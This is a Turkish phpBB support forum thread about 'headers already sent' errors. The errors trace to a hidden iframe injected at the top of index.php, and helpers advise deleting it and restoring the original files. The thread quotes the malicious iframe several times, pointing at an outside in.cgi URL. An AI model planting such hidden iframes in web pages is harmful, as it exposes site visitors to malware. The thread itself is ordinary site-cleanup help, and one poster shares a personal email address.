Headerda Hata

phpBB 3.0.x çalıştırılması ve kurulumu ile ilgili yardımı buradan alabilirsiniz. Lütfen MODlar ile ilgili sorunlarınızı buraya yazmayın.
Forum kuralları
- Yeni bir başlık açarken lütfen konu başlığına "Acil yardım", "Acele yardım" tarzlarında içerisinde "yardım" kelimesi geçen cümleler yazmayınız. Bu tip başlıklara kesinlikle cevap verilmeyecektir. Lütfen konu başlığına içeriği en iyi özetleyen anlaşılabilir bir cümle yazınız.

- Ayrıca yeni başlıklarınızı kesinlikle ilgili forumlara açınız. Örneğin, phpBB3 kurulum ve çalıştırması hakkında bir sorununuz varsa "3.0.x Destek Forumu" forumuna başlık açınız; phpBB3 temasından kaynaklı bir sorunuz varsa "3.0.x Stil/Tema Geliştirme & Tartışma & Yardım" forumuna başlık açınız; phpBB3 mod/eklentileriyle ilgili sorununuz varsa "3.0.x MOD Destek" forumuna başlık açınız. Bu kurala uymayan kullanıcıların başlıkları silinebilir ve kullanıcı uyarı alabilir ya da süresiz uzaklaştırılabilir.

- Site kurallarımızı okumadan kesinlikle forumlarımıza herhangi bir katılım yapmayınız.
basoglanh
Kayıtlı Kullanıcı
İletişim:

Headerda Hata

Mesaj gönderen basoglanh »

Selamlar.
Arkadaşlar hiç bir işlem yapmadığım halde sabah foruma girdiğimde forumun en üstünde

Kod: Tümünü seç

[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3681: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3683: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3684: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3685: Cannot modify header information - headers already sent by (output started at /index.php:1)
Hatasını alıyorum. Bunun sebebi ne olabilir.
Yeni bir güne gülümse !
Kullanıcı avatarı
mc_kelleci
Kayıtlı Kullanıcı
İletişim:

Re: Headerda Hata

Mesaj gönderen mc_kelleci »

index.php yi orjinal dosyasıyla değiştirin.
yada 2. satırda <?php yazıyorsa vede 1. satırda uzayıp giden bi kod varsa; 1. satırdaki kodu silin.
büyük ihtimalle sitenize saldırmışlar.dua edin debug mod acıkmış ;)
aklı olan okumasın sanayide iyi para veriyorlar :)
basoglanh
Kayıtlı Kullanıcı
İletişim:

Selamlar.
İndex.php orjinalim elimde yok pc ye daha yeni format attım eski verilerimi yedeklediğimi sanıyordum ama yedeklememişim. index.php deki ilk bölüm şöyle

<iframe wffhu='vCkPYB3D' tmvrd='7sXeKf4h' nicrd='cRyNUSLu' kqyly='w0Evp9BI' src='http://olthart.com/imag/in.cgi?2 ' mgrcb='h3cH4zVU' fwkfu='Q1Mj86mB' xtkhn='1y3h2nYU' bsfrj='jrckRfaO' width='2' height='18' style='display:none'></iframe><?php
/**
nereye kadar neyi silmem gerekiyor..
Teşekkürler.
Yeni bir güne gülümse !
Kullanıcı avatarı
mc_kelleci
Kayıtlı Kullanıcı
İletişim:

<?php den öncesini komple silin.

normal index.php böyle başlar.
<?php
/**
*
* @package phpBB3
* @version $Id: index.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License

yani aşağıdaki kısmı sileceksiniz.
<iframe wffhu='vCkPYB3D' tmvrd='7sXeKf4h' nicrd='cRyNUSLu' kqyly='w0Evp9BI' src='http://olthart.com/imag/in.cgi?2 ' mgrcb='h3cH4zVU' fwkfu='Q1Mj86mB' xtkhn='1y3h2nYU' bsfrj='jrckRfaO' width='2' height='18' style='display:none'></iframe>
basoglanh
Kayıtlı Kullanıcı
İletişim:

Orjinal dosyaları indirip orjinal index.php ile değiştirdim. Bahesttiğiniz kısmı sildim fakat aynı sorun sürdü sanırımn kodlardaki gibi index.php ye frame atmışlar. Herhalde şu anda sorun halledildi. Forumu daha gübvenli hale getirmek için şimdi neler yapailirim. Yardımcı olurmusunuz.
Yeni bir güne gülümse !
basoglanh
Kayıtlı Kullanıcı
İletişim:

Bu arada malesef aynı sorun devam ediyor yani index.php değiştirdiğim halde sayfama siteadi.com/index.php yazılınca ulaşılıyor. direk site adim.com olarak açılmıyor. Sebebi ne olabilir.
Yeni bir güne gülümse !
Kullanıcı avatarı
mc_kelleci
Kayıtlı Kullanıcı
İletişim:

.htacces dosyasının yedeğini atmayı dene bide. hata gitmiş beyaz sayfa sorunu var şimdi....
basoglanh
Kayıtlı Kullanıcı
İletişim:

Yine aynı .htaccess değiştirdim ama aynı sorun var. Bu arada beyaz sayfa sorunu değil www.kuscular.org olarak girip kaynak kodlarına baktığınızda aşağıdaki kodlar var.Valla anlamadım gitti yani. dünün yedeğini yükleyerek denedim yine aynı.

<iframe wffhu='vCkPYB3D' tmvrd='7sXeKf4h' nicrd='cRyNUSLu' kqyly='w0Evp9BI' src='http://olthart.com/imag/in.cgi?2 ' mgrcb='h3cH4zVU' fwkfu='Q1Mj86mB' xtkhn='1y3h2nYU' bsfrj='jrckRfaO' width='2' height='18' style='display:none'></iframe>
Yeni bir güne gülümse !
Kullanıcı avatarı
mc_kelleci
Kayıtlı Kullanıcı
İletişim:

mc_kelleci yazdı:<?php den öncesini komple silin.

normal index.php böyle başlar.
<?php
/**
*
* @package phpBB3
* @version $Id: index.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License

yani aşağıdaki kısmı sileceksiniz.
finansmy
Kayıtlı Kullanıcı

Mesaj gönderen finansmy »

Bende de bu çıkıyor üst kısımda durduk yere çıktı deli edicek bu phpbb3 sistemi kurduğuma kuracağıma pişman oldum her ay en az 2 -3 kere buna benzer sorunlar yaşıyorum. Yardımcı olmak isteyenler msn adresim finansmy@hotmail.com tşk..

[phpBB Debug] PHP Notice: in file /includes/session.php on line 916: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 916: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3647: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3649: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3650: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3651: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
chnnmhyt
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen chnnmhyt »

basoglanh yazdı:Selamlar.
Arkadaşlar hiç bir işlem yapmadığım halde sabah foruma girdiğimde forumun en üstünde

[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3681: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3683: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3684: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3685: Cannot modify header information - headers already sent by (output started at /index.php:1)
Hatasını alıyorum. Bunun sebebi ne olabilir.
dostum functıons.php nin orjinalini at ftp ne sorun kalmaz

finasmy dostum sende session dosyanı tekrar at orjinal olarak
Metal Müzik - Kültür Sanat Paylaşım Platformu
http://www.cehennemhayat.org
finansmy
Kayıtlı Kullanıcı

Sayın chnnmhyt neden böyle bir hata verir durduk yere, saldırımı var acaba??
finansmy
Kayıtlı Kullanıcı

İkisinide değiştridim düzelmedi, bu hatalar kendiliğinden oluşuyor ara ara sebebi nedir acaba?

[phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 885: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3391: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3393: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3394: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3395: Cannot modify header information - headers already sent by (output started at /includes/auth.php:1003)
finansmy
Kayıtlı Kullanıcı

auth.php dosyasını orjin ile değiştirince sorun halloldu fakat ajax chat devre dışı oldu sorundan sonra. chat ile header sorunun bir bağlantısı olabilir mi??? birde bana teknik konuda yardımcı olacak ekip arkadaşları gerekiyor. finansmy@hotmail.com
finansmy
Kayıtlı Kullanıcı

Bu sabah yine aynı hatayı verdi yine auth.php orjinali attım yine düzeldi nasıl bir sistem bu kafayı yedirtcek. Orjinal sürümünde olması gerek son konular gibi önemli eksikleri sonradan ekliyoruz. :oops: :oops: :oops:
Kilitli

“3.0.x Destek Forumu” sayfasına dön

Kimler çevrimiçi

Bu forumu görüntüleyen kullanıcılar: Hiç bir kayıtlı kullanıcı yok ve 4 misafir